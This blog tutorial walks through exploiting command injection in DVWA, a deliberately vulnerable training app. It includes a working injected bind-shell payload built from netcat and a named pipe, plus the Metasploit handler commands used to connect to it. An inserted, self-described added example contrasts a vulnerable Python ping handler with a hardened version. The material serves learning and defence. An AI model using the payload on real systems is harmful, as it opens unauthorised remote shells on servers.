
Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech
#redteam #kali #dvwa #metasploit

Command Injection is the manipulation of vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips input validation and passes user input straight into a shell command that it executes on the host. In this post we'll get our hands on DVWA's Command Injection section, and we'll open a backdoor on the server using Metasploit.

Visit the Command Injection section of DVWA.


The page says that it will ping an IP address for us, so let's see what it does for the IP 127.0.0.1:


Now, let's try to append a bash command (ls) after our input IP address:

127.0.0.1; ls


Sweet, DVWA simply appends our input to the underlying bash command!
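The pattern just observed, as an added example that is not DVWA's code and not part of the original post: a hypothetical ping handler written the unsafe way (user input concatenated into one shell string) next to a hardened version that validates the target as an IP literal and invokes ping without a shell. DVWA itself is PHP; Python is used here so the two forms can be compared side by side.

```python
"""Added example (hypothetical ping handler, not DVWA's code): the unsafe
string-concatenation pattern beside a hardened argv-based version."""
import ipaddress
import subprocess


def build_shell_command_unsafe(user_input: str) -> str:
    """The vulnerable pattern: the raw field is spliced into a single shell
    string, so a ';' in the input starts a second command."""
    return "ping -c 4 " + user_input


def validate_target(user_input: str) -> str:
    """Accept only a syntactically valid IPv4/IPv6 literal; anything else,
    including '127.0.0.1; ls', is rejected before any command is built."""
    candidate = user_input.strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {candidate!r}") from exc


def is_safe_target(user_input: str) -> bool:
    """Convenience wrapper: True only if validate_target() accepts the input."""
    try:
        validate_target(user_input)
        return True
    except ValueError:
        return False


def build_ping_argv(user_input: str) -> list:
    """Hardened form: the validated target is one argv element and no shell
    is involved, so shell metacharacters can never be interpreted."""
    return ["ping", "-c", "4", validate_target(user_input)]


def run_ping(user_input: str) -> str:
    """Execute the hardened command (argument list, shell=False by default)."""
    completed = subprocess.run(build_ping_argv(user_input),
                               capture_output=True, text=True, timeout=30)
    return completed.stdout


if __name__ == "__main__":
    # Constructed inputs: the honest one and the injected one from the post.
    for field in ("127.0.0.1", "127.0.0.1; ls"):
        print(repr(field), "unsafe:", build_shell_command_unsafe(field),
              "| accepted by validator:", is_safe_target(field))
```

Rejecting at the boundary is only half of the fix; the argv form matters too, because a valid IP literal passed through a shell string would still be safe, but any later relaxation of the validator would not be.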

Now, let's listen on port 4444 using netcat and redirect all the incoming bytes to a shell (sh):

127.0.0.1; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe


As you will notice, the page keeps loading forever, which means that our backdoor is open and waiting for us… :smile:

Let's start msfconsole and open the shell on the server:

msfconsole
use exploit/multi/handler
set payload linux/x64/shell/bind_tcp
set RHOST 127.0.0.1


Note that we didn't set the LPORT of bind_tcp, since its default is 4444.

As you can see, we are the www-data user, and that's why we can't read the /etc/shadow file, which contains the hashed user passwords of the operating system. But we have all the privileges that the www-data user has, and we can e.g. modify DVWA or escalate to root by exploiting a local privilege escalation vulnerability.

Happy binding!

Me

Panos is on a mission to protect what you ❤️ by delivering products that utilize cryptographic principles and respect the privacy of their users. In the past he did research in Computer Security and Machine Learning and currently he works as a Software Engineer for Office 365, focusing on Security Engineering.